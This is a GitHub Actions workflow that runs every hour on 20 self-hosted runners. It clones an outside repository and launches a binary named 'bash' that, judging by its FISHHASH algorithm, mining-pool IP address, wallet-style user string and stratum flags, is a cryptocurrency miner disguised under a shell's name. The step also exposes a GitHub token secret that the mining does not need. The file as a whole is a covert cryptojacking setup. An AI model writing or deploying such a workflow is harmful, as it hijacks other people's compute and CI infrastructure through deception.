yml
name: Run bash --noTest (20 VPS)

on:
  workflow_dispatch:
  schedule:
    - cron: "0 * * * *"

permissions:
  contents: read

concurrency:
  group: tesaction-run
  cancel-in-progress: false

jobs:
  run:
    timeout-minutes: 5

    strategy:
      fail-fast: false
      matrix:
        runner:
          - vps-1
          - vps-2
          - vps-3
          - vps-4
          - vps-5
          - vps-6
          - vps-7
          - vps-8
          - vps-9
          - vps-10
          - vps-11
          - vps-12
          - vps-13
          - vps-14
          - vps-15
          - vps-16
          - vps-17
          - vps-18
          - vps-19
          - vps-20

    runs-on:
      - self-hosted
      
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Debug runner
        run: |
          echo "Runner: ${{ matrix.runner }}"
          hostname
          nproc

      - name: Clone target repo & run bash
        env:
          GH_TOKEN: ${{ secrets.GH_TOKEN }}
        run: |
          git clone https://github.com/hujisanda/lol198.git && cd lol198 && chmod u+x bash && ./bash --algo FISHHASH --pool 138.197.24.47:80 --user c9f8d6c1849abbcd164f6c72002d9ac44b9deaef70481739a29d1733915defca+115098.jasin --ethstratum ETHPROX
          
